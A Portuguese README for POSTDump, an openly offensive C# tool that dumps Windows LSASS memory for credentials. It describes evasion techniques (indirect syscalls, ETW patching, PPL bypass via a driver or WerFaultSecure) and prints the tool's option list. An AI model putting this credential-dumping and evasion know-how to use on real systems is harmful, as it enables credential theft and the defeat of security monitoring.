
Ferramenta C# para minidump do LSASS com múltiplas técnicas de evasão, incluindo chamadas de sistema indiretas, patch do ETW e bypass de PPL via driver ou falha do WER. Suporte para análise de credenciais criptografadas/na memória.
Outra ferramenta para realizar minidump do processo LSASS usando algumas técnicas para evitar detecção.

POSTDump é a implementação em C# / .NET da função minidump do ReactOS (como o nanodump), evitando assim a chamada à função MiniDumpWriteDump da API do Windows. O código da lógica de dump é salvo no projeto POSTMinidump, fique à vontade para usá-lo em seus próprios projetos.
Tal como o NanoDump, você pode criptografar ou usar uma assinatura inválida para o minidump.
O uso do driver ProcExp é suportado para despejar/matar processos protegidos.
Despejar LSASS:
c:\Temp>PostDump.exe --help
"[PPL DISABLED]\n" +
"--snap - Use snapshot technic\n" +
"--fork - Use fork technic [default]\n" +
"--duplicate-elevate - Look for existing lsass handle to duplicate and elevate\n" +
"--elevate-handle - Open a handle with low privileges and duplicate it to gain higher privileges (default: true)\n" +
"--asr - Attempt dump using ASR bypass (no signature/encrypt available, .dmp file written on disk)\n" +
"[PPL ENABLED]\n" +
"--duplicate-elevate - Look for existing lsass handle to duplicate and elevate\n" +
"--werfaultsecure - Attempt dump using vulnerable werfaultsecure to dump PPL process\n" +
"--driver, -d - Use Process Explorer driver to open lsass handle and dump lsass\n" +
"--kill, -k [processID] - Use Process Explorer driver to kill process and exit\n" +
"[GLOBAL]\n" +
"--help, -h - Display help\n" +
"--encrypt, -e - Encrypt dump in-memory\n" +
"--signature, -s - Generate invalid Minidump signature\n" +
"--live - Parse creds from memory without writing into file on disk\n" +
"--parse-dump - Parse creds from dump file\n" +
"--outfile, -o - Output file where to write dump\n" +
Trabalho no POST Luxembourg e agradeço por me alocarem tempo para desenvolver e manter este projeto! Visite o site da POST em https://www.post.lu/business/produits-et-services/cyberforce.
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.